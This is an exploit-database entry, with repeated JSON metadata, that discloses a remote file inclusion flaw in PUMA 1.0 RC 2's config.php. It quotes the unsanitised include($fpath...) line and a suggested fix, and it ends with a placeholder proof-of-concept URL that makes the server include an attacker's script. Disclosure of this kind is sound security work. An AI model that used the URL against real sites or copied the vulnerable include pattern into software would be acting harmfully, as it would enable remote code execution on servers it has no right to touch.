ID 1337DAY-ID-810
Type zdt
Reporter Philipp Niedziela
Modified 2006-09-10T00:00:00
Description
Exploit for unknown platform in category web applications
===============================================================
PUMA <= 1.0 RC 2 (config.php) Remote File Include Vulnerability
===============================================================
+--------------------------------------------------------------------
+
+ PUMA 1.0 RC 2 (config.php) Remote File Inclusion
+
+--------------------------------------------------------------------
+
+ Affected Software .: PUMA 1.0 RC 2
+ Venedor ...........: http://php.psywerx.net/
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+
+--------------------------------------------------------------------
+
+ Affected File:
+ /config.php
+
+ Code:
+ .....
+ // Select language
+ $lang = "lang_english.php";
+ include($fpath."./language/$lang");
+ .....
+
+--------------------------------------------------------------------
+
+ $fpath is not properly sanitized before being used
+
+--------------------------------------------------------------------
+
+ Solution:
+ -> Declare $fpath!
+ -> Deny direct access to config.php
+ -> or modify code:
+
+ if(!isset($_REQUEST['fpath']) && !isset($_GET['fpath']) &&
!isset($_POST['fpath'])){
+ //code of org. config.php
+ }
+ else {
+ echo "You cannot access this file directly.";
+ die();
+ }
+
+--------------------------------------------------------------------
+
+ PoC:
+
+ http://[target]/config.php?fpath=[script]
+
+
+-------------------------[ E O F ]----------------------------------
# 0day.today [2018-01-02] #
{"id": "1337DAY-ID-810", "lastseen": "2018-01-02T09:16:10", "viewCount": 6, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2018-01-02T09:16:10", "rev": 2}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB4535288", "KB4532095", "KB4532098"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220171082", "OPENVAS:1361412562311220171081"]}, {"type": "zdt", "idList": ["1337DAY-ID-30759", "1337DAY-ID-31953", "1337DAY-ID-33402"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:02CDEF66A799736EF15E27F1771DA9EA"]}, {"type": "exploitdb", "idList": ["EDB-ID:47536"]}, {"type": "cve", "idList": ["CVE-2015-9222", "CVE-2017-12120", "CVE-2019-10969", "CVE-2019-10963"]}, {"type": "ics", "idList": ["ICSA-19-274-03"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SSH/LIBSSH_AUTH_BYPASS"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2017-0245.NASL"]}, {"type": "seebug", "idList": ["SSV:97231"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A234F8456A3CCBBC3F469D5F49D64E29"]}, {"type": "talos", "idList": ["TALOS-2017-0472"]}], "modified": "2018-01-02T09:16:10", "rev": 2}, "vulnersScore": 5.7}, "type": "zdt", "sourceHref": "https://0day.today/exploit/810", "description": "Exploit for unknown platform in category web applications", "title": "PUMA <= 1.0 RC 2 (config.php) Remote File Include Vulnerability", "cvelist": [], "sourceData": "===============================================================\r\nPUMA <= 1.0 RC 2 (config.php) Remote File Include Vulnerability\r\n===============================================================\r\n\r\n\r\n\r\n+--------------------------------------------------------------------\r\n+\r\n+ PUMA 1.0 RC 2 (config.php) Remote File Inclusion\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ Affected Software .: PUMA 1.0 RC 2\r\n+ Venedor ...........: http://php.psywerx.net/\r\n+ Class .............: Remote File Inclusion\r\n+ Risk ..............: high (Remote File Execution)\r\n+ Found by ..........: Philipp Niedziela\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ Affected File:\r\n+ /config.php\r\n+\r\n+ Code:\r\n+ .....\r\n+ // Select language\r\n+ $lang = \"lang_english.php\";\r\n+ include($fpath.\"./language/$lang\");\r\n+ .....\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ $fpath is not properly sanitized before being used\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ Solution:\r\n+ -> Declare $fpath!\r\n+ -> Deny direct access to config.php\r\n+ -> or modify code:\r\n+\r\n+ if(!isset($_REQUEST['fpath']) && !isset($_GET['fpath']) &&\r\n!isset($_POST['fpath'])){\r\n+ //code of org. config.php\r\n+ }\r\n+ else {\r\n+ echo \"You cannot access this file directly.\";\r\n+ die();\r\n+ }\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ PoC:\r\n+\r\n+ http://[target]/config.php?fpath=[script]\r\n+\r\n+\r\n+-------------------------[ E O F ]----------------------------------\r\n\r\n\r\n\n# 0day.today [2018-01-02] #", "published": "2006-09-10T00:00:00", "references": [], "reporter": "Philipp Niedziela", "modified": "2006-09-10T00:00:00", "href": "https://0day.today/exploit/description/810"}
{}